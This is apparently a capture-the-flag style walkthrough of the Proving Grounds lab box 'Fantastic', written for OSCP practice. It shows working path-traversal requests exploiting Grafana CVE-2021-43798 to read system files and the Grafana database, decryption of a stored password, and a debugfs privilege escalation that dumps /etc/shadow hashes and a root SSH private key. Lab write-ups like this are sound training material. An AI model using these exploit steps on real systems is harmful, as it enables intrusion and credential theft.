Post cover image

June 11, 2026

Fantastic | Proving Grounds | OSCP Preparation

Box: Fantastic Community Rating: Hard

SilentExploit

7 min read

We can start off with a nmap scan of the target:

┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-11 23:34 BST
Initiating Parallel DNS resolution of 1 host. at 23:34
Completed Parallel DNS resolution of 1 host. at 23:34, 0.02s elapsed
Initiating SYN Stealth Scan at 23:34
Scanning 192.168.181.181 [65535 ports]
Discovered open port 22/tcp on 192.168.181.181
Discovered open port 3000/tcp on 192.168.181.181
Discovered open port 9090/tcp on 192.168.181.181
Completed SYN Stealth Scan at 23:35, 9.78s elapsed (65535 total ports)
Nmap scan report for 192.168.181.181
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
9090/tcp open  zeus-admin

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 9.92 seconds
           Raw packets sent: 65538 (2.884MB) | Rcvd: 65538 (2.622MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-11 23:35 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:35
Completed Parallel DNS resolution of 1 host. at 23:35, 0.02s elapsed
Initiating SYN Stealth Scan at 23:35
Scanning 192.168.181.181 [1000 ports]
Discovered open port 22/tcp on 192.168.181.181
Discovered open port 3000/tcp on 192.168.181.181
Discovered open port 9090/tcp on 192.168.181.181
Completed SYN Stealth Scan at 23:35, 0.41s elapsed (1000 total ports)
Initiating Service scan at 23:35
Scanning 3 services on 192.168.181.181
Completed Service scan at 23:35, 36.64s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.181.181.
Initiating NSE at 23:35
Completed NSE at 23:36, 30.07s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.12s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Nmap scan report for 192.168.181.181
Host is up (0.022s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
3000/tcp open  http    Grafana http
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Grafana
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: 9FB2EC595C187307F390043A5AA66F8B
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 1 disallowed entry
|_/
9090/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods:
|_  Supported Methods: GET OPTIONS
| http-title: Prometheus Time Series Collection and Processing Server
|_Requested resource was /graph
|_http-favicon: Unknown favicon MD5: 5EE43B38986A144D6B5022EA8C8F748F
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.01s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.81 seconds
           Raw packets sent: 1000 (44.000KB) | Rcvd: 1000 (40.012KB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-11 23:36 BST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:36
Completed NSE at 23:36, 10.01s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating Ping Scan at 23:36
Scanning 192.168.181.181 [4 ports]
Completed Ping Scan at 23:36, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:36
Completed Parallel DNS resolution of 1 host. at 23:36, 0.02s elapsed
Initiating SYN Stealth Scan at 23:36
Scanning 192.168.181.181 [1000 ports]
Discovered open port 22/tcp on 192.168.181.181
Discovered open port 9090/tcp on 192.168.181.181
Discovered open port 3000/tcp on 192.168.181.181
Completed SYN Stealth Scan at 23:36, 0.41s elapsed (1000 total ports)
NSE: Script scanning 192.168.181.181.
Initiating NSE at 23:36
Completed NSE at 23:36, 0.34s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Nmap scan report for 192.168.181.181
Host is up (0.023s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
9090/tcp open  zeus-admin

NSE: Script Post-scanning.
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.052KB)

Port 3000

This was our most obvious point of entry; a Grafana instance.

None

Fingerprinting the service as V8.3.0 was fairly straight forward as per the above screenshot. How do we get access to the login panel though ?

A quick search reveals the classic pair admin:admin.

┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# creds search "grafana"
+-------------------+----------+----------+
| Product           | username | password |
+-------------------+----------+----------+
| grafana (general) |  admin   |  admin   |
+-------------------+----------+----------+

Unfortunately, these credentials don't work. I did spend lots of time going down a rabbithole trying to brute force / guess less common 'default' credentials.

I then came across a directory traversal exploit — CVE-2021–43798

This impacts our Grafana v8.0.0-beta1 through v8.3.0 so we are in luck !

There is a clear PoC here that I used as the basis of my testing.

Firstly, I targeted /etc/passwd

┌──(venv)─(root㉿user)-[/run//user/2024/HTBox/fantastic]
└─# curl "http://192.168.181.181:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" --path-as-is
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
grafana:x:113:117::/usr/share/grafana:/bin/false
prometheus:x:1000:1000::/home/prometheus:/bin/false
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh

This gives us valuable insight that we have two users with shell access: root and sysadmin.

I will always try username as password combos and run a brute force attack in the background as you can sometimes get lucky.

I am learning doing these Offsec boxes that whenever you have Local File Inclusion you need to think: what configuration files or databases specific to the services running on the target could I pillage information from ? I.e. if there was a wordpress site discovered in our enumeration phase we would target /wp-config.php .

Some googling helped uncover the default location for the grafana database is/var/lib/grafana/grafana.db

None

We can grab this via LFI — I simply put the following into my browser and we instantly downloaded it.

http://192.168.181.181:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2fgrafana%2fgrafana.db
None

If I would have researched the attack chain for this exploit I would have saved myself lots of time but I manually went through every table in the database until I got to the table data_source.

None

Here I found that we had this 'basicAuthPassword' string that is obviously encoded. We can see that it is also linked to the user sysadmin so this was the green flag we needed to spot that it needs to be decrypted.

Some researching led me to Grafana-Decryptor-for-CVE-2021–43798

Looking at the syntax, it is capable of decrypting my password so long as I provide it with the secret_key from my grafana instance. The default key is SW2YcwTIb9zpOOhoPsMm but due to me rushing into the exploitation — I went back to our LFI exploit and grabbed a copy of it to make sure.

http://192.168.181.181:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgrafana%2Fgrafana.ini
None

I then ran the script:

┌──(venv)─(root㉿user)-[/run/…/2024/HTBox/fantastic/Grafana-Decryptor-for-CVE-2021-43798]
└─# python3 decrypt.py

    ######################################
             GRAFANA DECRYPTOR
 CVE-2021-43798 Grafana Unauthorized
  arbitrary file reading vulnerability
                SICARI0
    ######################################

? Enter the datasource password: anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
/run/media/user/2024/HTBox/fantastic/Grafana-Decryptor-for-CVE-2021-43798/decrypt.py:55: CryptographyDeprecationWarning: CFB has been moved to cryptography.hazmat.decrepit.ciphers.modes.CFB and will be removed from cryptography.hazmat.primitives.ciphers.modes in 49.0.0.
  decryptor = Cipher(algorithms.AES(block), modes.CFB(iv), backend=default_backend()).decryptor()
[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
[*] plainText= SuperSecureP@ssw0rd

We have our username:password for SSH access sysadmin:SuperSecureP@ssw0rd

Privilege Escalation

The privilege escalation on the machine was incredibly quick. If you check the group memberships for sysadmin you'll see they are a member of (disk).

$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin),6(disk)

Raj has a great article on how to exploit this -link

Essentially, we are using the debugfs tool to interact directly with the system's storage blocks. This bypasses standard operating system file permissions allowing us access to any file on the system.

My command log for carrying out the attack to read the /etc/shadow file and /root/.ssh/id_rsa is disclosed:

sysadmin@fanatastic:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            445M     0  445M   0% /dev
tmpfs            98M  1.2M   97M   2% /run
/dev/sda2       9.8G  5.6G  3.7G  61% /
tmpfs           489M     0  489M   0% /dev/shm
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           489M     0  489M   0% /sys/fs/cgroup
/dev/loop0       62M   62M     0 100% /snap/core20/1328
/dev/loop1       33M   33M     0 100% /snap/snapd/12883
/dev/loop3       56M   56M     0 100% /snap/core18/2128
/dev/loop6       71M   71M     0 100% /snap/lxd/21029
/dev/loop4       68M   68M     0 100% /snap/lxd/21835
/dev/loop2       44M   44M     0 100% /snap/snapd/14549
/dev/loop5       56M   56M     0 100% /snap/core18/2284
tmpfs            98M     0   98M   0% /run/user/1001
sysadmin@fanatastic:~$ debugfs /dev/sda2
debugfs 1.45.5 (07-Jan-2020)
debugfs:  mkdir test
mkdir: Filesystem opened read/only
debugfs:  cat /etc/shadow
root:$6$mAe2JsSJSmg1n45O$78rgk3B6HaklRIPcLOtwP9aX5i.0aPF16NVm39i1cz3K7StTajlI2LFBp.WSxiAAyoB4SQd5qc123HVmH0HXJ/:19052:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
sys:*:18474:0:99999:7:::
sync:*:18474:0:99999:7:::
games:*:18474:0:99999:7:::
man:*:18474:0:99999:7:::
lp:*:18474:0:99999:7:::
mail:*:18474:0:99999:7:::
news:*:18474:0:99999:7:::
uucp:*:18474:0:99999:7:::
proxy:*:18474:0:99999:7:::
www-data:*:18474:0:99999:7:::
backup:*:18474:0:99999:7:::
list:*:18474:0:99999:7:::
irc:*:18474:0:99999:7:::
gnats:*:18474:0:99999:7:::
nobody:*:18474:0:99999:7:::
systemd-network:*:18474:0:99999:7:::
systemd-resolve:*:18474:0:99999:7:::
systemd-timesync:*:18474:0:99999:7:::
messagebus:*:18474:0:99999:7:::
syslog:*:18474:0:99999:7:::
_apt:*:18474:0:99999:7:::
tss:*:18474:0:99999:7:::
uuidd:*:18474:0:99999:7:::
tcpdump:*:18474:0:99999:7:::
landscape:*:18474:0:99999:7:::
pollinate:*:18474:0:99999:7:::
sshd:*:18634:0:99999:7:::
systemd-coredump:!!:18634::::::
lxd:!:18634::::::
usbmux:*:18864:0:99999:7:::
grafana:*:19027:0:99999:7:::
prometheus:!:19027:0:99999:7:::
sysadmin:$6$dpIlzNJI20lx.1rY$42EDl48wSZPsE0rcdqwraFS9ZXCPPLzS4wW4CbJqV4hBuuDWya39YSK0CGIYzaJIWg.vtEQn7615Dqs30eb4/0:19027:0:99999:7:::
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAz1L/rbeJcJOc5T4Lppdp0oVnX0MgpfaBjW25My3ffAeJTeJwM1/R
YGtnByjnBAisdAsqctvGjZL6TewN4QNM0ew5qD2BQUU38bvq1lRdvbaD1m+WZkhp6DJrbi
42MKCUeTMY5AEPBPe4kHBN294BiUycmtLzQz5gJ99AUSQa59m6QJso4YlC7OCs7xkDAxSJ
pE56z1yaiY+y4l2akIxbAz7TVmJgRnhjJ4ZRuV2TYuSolJiSNeUyIUTozfRKl56Zs8f/QA
4Pd9AvSLZPN+s/INAULdxzgV3X9xHYh2NfRe8hw1Ju9OeJZ9lqQNBtFrit0ekpk75CJ2Z6
AMDV5tNlEcixwf/nMhjQb7Q/Oh4p7ievBk47f5t2dKlTsWw4iq1AX3FVA65n2TfD6cNISj
mxfQvXzMTPrs8KO7pHzMVQZZukOIwOEKwuZfNxIg4riGQvy4Cs+3c4w022UJ8oH36itgjr
pa4Ce+uRomYgRthDLaTNmk52TbZl0pg8AdDXB0SbAAAFgCd1RWkndUVpAAAAB3NzaC1yc2
EAAAGBAM9S/623iXCTnOU+C6aXadKFZ19DIKX2gY1tuTMt33wHiU3icDNf0WBrZwco5wQI
rHQLKnLbxo2S+k3sDeEDTNHsOag9gUFFN/G76tZUXb22g9ZvlmZIaegya24uNjCglHkzGO
QBDwT3uJBwTdveAYlMnJrS80M+YCffQFEkGufZukCbKOGJQuzgrO8ZAwMUiaROes9cmomP
suJdmpCMWwM+01ZiYEZ4YyeGUbldk2LkqJSYkjXlMiFE6M30SpeembPH/0AOD3fQL0i2Tz
frPyDQFC3cc4Fd1/cR2IdjX0XvIcNSbvTniWfZakDQbRa4rdHpKZO+QidmegDA1ebTZRHI
scH/5zIY0G+0PzoeKe4nrwZOO3+bdnSpU7FsOIqtQF9xVQOuZ9k3w+nDSEo5sX0L18zEz6
7PCju6R8zFUGWbpDiMDhCsLmXzcSIOK4hkL8uArPt3OMNNtlCfKB9+orYI66WuAnvrkaJm
IEbYQy2kzZpOdk22ZdKYPAHQ1wdEmwAAAAMBAAEAAAGAdNLfEcNHJfF3ylFQ/Vl6ns7fNf
W8cuhZjhkS77zcnqYcf4+mC7zlXYCHuKgarNI6YtVb4QbodiQo+TmXhIB4jB2hS6UErYPU
h1mNdaJqhBlRZsbQJ+iMDPRERvyxOmtx3m2li+zwyqrQDEvMA6Wwle5enHtb6js+sZkCQ/
alVpoAcqE7wwK2fIYJzFz6roSnHre+ShRzXCpl8VovW15LdqOzMI0UlQEHVmFAscQB5grU
1461bLsuqUKMMGmEkrUiAAQ3UujH2bovUZI02kOyoyijozwZXdQz1nM+LltrgFR1diOmdu
fYr23bjGRTi65Dx4Lw2a/KMiXeYvWb0u7kJ2rlEs01Vbvd2egx/TtZtqkEkWOhahO6oiAl
iwSc3734fdj6N7hcNcIj0KLqJoAdJfDtTwfdR2j8SbmtslztVEBtOU96KKUYT+XPbzaJjX
zzzA0m5TSq3mOvkm7zC6jNCnGQ2CznJTep2MlhAjIhGVbFT5Qh9pv4nr45xphqabbZAAAA
wFQQjZbLtbUxH4IuIeMqyWOmbRVoU9YC5NdWGF8ep2Ma4BEB7bBJw+g9SsT3z/rumzQeo3
2Eigs3NRsqULsQqr/Ts80AzjPuG11WU4p/5D+8dQhTyoseMPeg9JwveiZLZRJnlER3Bi2M
zv9mWw8ByNcWY0tyNTrQj5pUTLhhukMqRonMYV/qsAZVZs8VGvWT90NEVs9VL5bP22QDGO
mhkLPbQpBsrUBGBn53euvpw0DvnPI9YUrvzaQZjVDQU3uIcgAAAMEA/0jDXV/NDkTzvdlp
ZMgBvIPJAdWpiEj0GzsaBMlj5dDNTarsr1j82lYIXmG8S+T8E/iSRe0cvasxOM3tseIBVq
EFdhim3jh/mMKX1DfBMDShM5Q7xZr4eczl6xyJ1Qs4Nu3RHszWeeiqYXJeHjbpySnZ/Wec
atyS247gMCb2jYMXX8khnkHj1BWp1bHTpQuI/3oxrVSZVXbfUmfbJbsMtXlVgM3+5yqeny
29f1ZFlpb1NyhFe4U3plbXjLLwwY+PAAAAwQDP58+hi3mm0UoPaQXSFIQ2XPsc1TnxVZkF
WTKAu4jtHPrF9p19nZS3j3AJ0ndr0niWW9gGmQtjz56m06TtBCQAQw8P3ITt5uBkxRuwpd
fC7bp88+tDwg47yGdnHe4/bsX90J8x+/WVa2LbK/7Fh64djpoeN4WAHfKB/fmXGJ+kt0mu
qDz911lrLT9H8CrpYXlrKy5jxhO8yxqU1CqmZe8H8ILFMPyuw8UuOCF7EnhLR2ReAmOS2l
T3skewpHe8tDUAAAALcm9vdEB1YnVudHU=
-----END OPENSSH PRIVATE KEY-----

You could either crack the root password or login via SSH; obviously the latter is easiest so I saved a copy of the ssh key and authenticated to the target directly as root.

──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# chmod 777 id_rsa

┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# ssh -i id_rsa root@192.168.181.181
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-97-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 11 Jun 2026 10:30:53 PM UTC

  System load:  0.0               Processes:               216
  Usage of /:   57.0% of 9.78GB   Users logged in:         1
  Memory usage: 32%               IPv4 address for ens160: 192.168.181.181
  Swap usage:   0%

0 updates can be applied immediately.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Mar  1 18:46:45 2022
root@fanatastic:~# id
uid=0(root) gid=0(root) groups=0(root)